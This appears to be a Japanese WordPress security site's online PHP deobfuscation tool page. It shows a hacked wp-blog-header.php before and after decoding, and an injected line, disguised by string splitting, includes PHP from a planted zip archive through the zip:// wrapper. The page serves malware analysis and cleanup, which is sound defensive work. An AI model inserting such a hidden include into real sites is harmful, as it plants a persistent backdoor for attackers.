Japanese English

PHP 難読化コードの復元・デコード

Wordpress 等でのPHPのマルウェア・ウィルス・改ざんコードをデコードして難読化をオンラインで解除し、
元の読みやすいコードに戻し解読できます。

※すべての難読化コードを解除できるわけではございませんのでご理解とご了承をお願いいたします。

下記のコードを難読化解除しました

<?php /** * Loads the WordPress environment and template. * * @package WordPress */ if ( ! isset( $wp_did_header ) ) { $wp_did_header = true; // Load the WordPress library. require_once __DIR__ . '/wp-load.php'; include("zi"."p://wp-includes/cw1456.zip#cw1456"); // Set up the WordPress query. wp(...



難読化されたPHPコード

<?php
/**
 * Loads the WordPress environment and template.
 *
 * @package WordPress
 */

if ( ! isset( $wp_did_header ) ) {

	$wp_did_header = true;

	// Load the WordPress library.
	require_once __DIR__ . '/wp-load.php';
        include("zi"."p://wp-includes/cw1456.zip#cw1456");
	// Set up the WordPress query.
	wp();

	// Load the theme template.
	require_once ABSPATH . WPINC . '/template-loader.php';

}

デコード(難読化解除)されたコード

<?php

/**
 * Loads the WordPress environment and template.
 *
 * @package WordPress
 */
if (!isset($wp_did_header)) {
    $wp_did_header = true;
    // Load the WordPress library.
    require_once "/var/www/html/wp-load.php";
    include "zip://wp-includes/cw1456.zip#cw1456";
    // Set up the WordPress query.
    wp();
    // Load the theme template.
    require_once "ABSPATHWPINC/template-loader.php";
}


■【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除]

■WordPress のマルウェア駆除、セキュリティー対策 カスタマイズや修正、引っ越し・復旧のご依頼承ります

(C)2019 ワードプレス ドクター All rights reserved.